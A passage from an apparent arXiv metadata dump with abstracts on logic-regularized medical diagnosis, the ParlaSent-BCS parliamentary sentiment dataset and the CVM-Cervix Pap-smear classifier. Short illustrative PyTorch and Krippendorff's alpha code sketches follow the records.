supervised learning of neural models with logic regularization that combines
the advantages of the different methods. Our experiments on real and synthetic
data show that the proposed approach outperforms the best existing methods in
the accuracy of diagnosis when the number of diagnoses and symptoms is large.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 07:57:17 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Nesterov",
"Aleksandr",
""
],
[
"Ibragimov",
"Bulat",
""
],
[
"Umerenkov",
"Dmitriy",
""
],
[
"Shelmanov",
"Artem",
""
],
[
"Zubkova",
"Galina",
""
],
[
"Kokh",
"Vladimir",
""
]
] |
new_dataset
| 0.965537 |
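
The abstract above does not spell out its logic rules, so the following is only a speculative PyTorch sketch of what a logic-regularized supervised loss could look like; the illustrative rule (do not re-propose symptoms that were already asked about) and the weight `lam` are assumptions, not the paper's formulation.

```python
import torch
import torch.nn.functional as F

def logic_regularized_loss(symptom_logits, diag_logits, asked_mask, diag_target, lam=0.1):
    """Supervised diagnosis loss plus a soft logic penalty. Illustrative rule:
    the probability mass on already-asked symptoms should be near zero."""
    ce = F.cross_entropy(diag_logits, diag_target)     # standard supervised term
    sym_probs = torch.softmax(symptom_logits, dim=-1)  # next-symptom distribution
    # asked_mask: {0, 1} tensor marking symptoms the system has already queried
    logic_penalty = (sym_probs * asked_mask).sum(dim=-1).mean()
    return ce + lam * logic_penalty
```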
2206.00929
|
Peter Rupnik
|
Michal Mochtak, Peter Rupnik, Nikola Ljube\v{s}i\v{c}
|
The ParlaSent-BCS dataset of sentiment-annotated parliamentary debates
from Bosnia-Herzegovina, Croatia, and Serbia
|
8 pages, submitted to JT-DH 2022 (Language Technologies and Digital
Humanities 2022) conference, number 4293
| null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by-sa/4.0/
|
Expression of sentiment in parliamentary debates is deemed to be
significantly different from that on social media or in product reviews. This
paper adds to an emerging body of research on parliamentary debates with a
dataset of sentences annotated for sentiment polarity detection in political
discourse. We sample the sentences for annotation from the proceedings of three
Southeast European parliaments: Croatia, Bosnia-Herzegovina, and Serbia. A
six-level schema is applied to the data with the aim of training a
classification model for the detection of sentiment in parliamentary
proceedings. Krippendorff's alpha measuring the inter-annotator agreement
ranges from 0.6 for the six-level annotation schema to 0.75 for the three-level
schema and 0.83 for the two-level schema. Our initial experiments on the
dataset show that transformer models perform significantly better than those
using a simpler architecture. Furthermore, regardless of the similarity of the
three languages, we observe differences in performance across different
languages. Performing parliament-specific training and evaluation shows that
the main reason for the differing performance between parliaments seems to be
the different complexity of the automatic classification task, which is not
observable in annotator performance. Language distance does not seem to play
any role in either annotator or automatic classification performance. We
release the dataset and the best-performing model under permissive licences.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 08:45:14 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Mochtak",
"Michal",
""
],
[
"Rupnik",
"Peter",
""
],
[
"Ljubešič",
"Nikola",
""
]
] |
new_dataset
| 0.999698 |
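
The Krippendorff's alpha figures reported above can be reproduced for any annotation matrix with the third-party `krippendorff` package, as in this sketch; the annotation values below are made up for illustration, so the resulting number is not one of the paper's.

```python
import numpy as np
import krippendorff  # pip install krippendorff

# Rows = annotators, columns = sentences; np.nan marks missing annotations.
# Values encode the six-level sentiment schema as integers 0..5 (illustrative data).
reliability_data = np.array([
    [0, 2, 5, 3, np.nan, 1],
    [0, 2, 4, 3, 5,      1],
    [1, 2, 5, 3, 5,      np.nan],
], dtype=float)

alpha = krippendorff.alpha(reliability_data=reliability_data,
                           level_of_measurement="nominal")
print(f"Krippendorff's alpha: {alpha:.3f}")
```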
2206.00971
|
Wanli Liu
|
Wanli Liu, Chen Li, Ning Xu, Tao Jiang, Md Mamunur Rahaman, Hongzan
Sun, Xiangchen Wu, Weiming Hu, Haoyuan Chen, Changhao Sun, Yudong Yao, Marcin
Grzegorzek
|
CVM-Cervix: A Hybrid Cervical Pap-Smear Image Classification Framework
Using CNN, Visual Transformer and Multilayer Perceptron
| null | null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Cervical cancer is the seventh most common cancer worldwide and the fourth
most common cancer among women. Cervical cytopathology
image classification is an important method to diagnose cervical cancer. Manual
screening of cytopathology images is time-consuming and error-prone. The
emergence of the automatic computer-aided diagnosis system solves this problem.
This paper proposes a framework called CVM-Cervix based on deep learning to
perform cervical cell classification tasks. It can analyze Pap slides quickly
and accurately. CVM-Cervix first uses a Convolutional Neural Network module
and a Visual Transformer module for local and global feature extraction,
respectively; then a Multilayer Perceptron module is designed to fuse the local
and global features for the final classification. Experimental results show the
effectiveness and potential of the proposed CVM-Cervix in the field of cervical
Pap smear image classification. In addition, according to the practical needs
of clinical work, we perform a lightweight post-processing step to compress the
model.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 10:16:07 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Liu",
"Wanli",
""
],
[
"Li",
"Chen",
""
],
[
"Xu",
"Ning",
""
],
[
"Jiang",
"Tao",
""
],
[
"Rahaman",
"Md Mamunur",
""
],
[
"Sun",
"Hongzan",
""
],
[
"Wu",
"Xiangchen",
""
],
[
"Hu",
"Weiming",
""
],
[
"Chen",
"Haoyuan",
""
],
[
"Sun",
"Changhao",
""
],
[
"Yao",
"Yudong",
""
],
[
"Grzegorzek",
"Marcin",
""
]
] |
new_dataset
| 0.994992 |
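
A minimal sketch of the CNN + Visual Transformer + MLP fusion described in the CVM-Cervix abstract above, assuming PyTorch with `timm` backbones; the specific backbones, feature dimensions, and class count are placeholder assumptions, not the paper's exact configuration.

```python
import torch
import torch.nn as nn
import timm  # pip install timm

class HybridCervixClassifier(nn.Module):
    """CNN branch for local features + ViT branch for global features,
    concatenated and fused by an MLP head (a sketch of the CVM-Cervix idea)."""

    def __init__(self, num_classes: int = 5):
        super().__init__()
        # num_classes=0 makes timm return pooled backbone features, no head.
        self.cnn = timm.create_model("resnet50", pretrained=True, num_classes=0)  # 2048-d
        self.vit = timm.create_model("vit_base_patch16_224", pretrained=True,
                                     num_classes=0)                               # 768-d
        self.mlp = nn.Sequential(
            nn.Linear(2048 + 768, 512), nn.ReLU(), nn.Dropout(0.2),
            nn.Linear(512, num_classes),
        )

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        # x: (B, 3, 224, 224) RGB batch, so both branches share one input pipeline
        local_feat = self.cnn(x)    # (B, 2048) pooled CNN features (local cues)
        global_feat = self.vit(x)   # (B, 768) ViT features (global context)
        return self.mlp(torch.cat([local_feat, global_feat], dim=1))
```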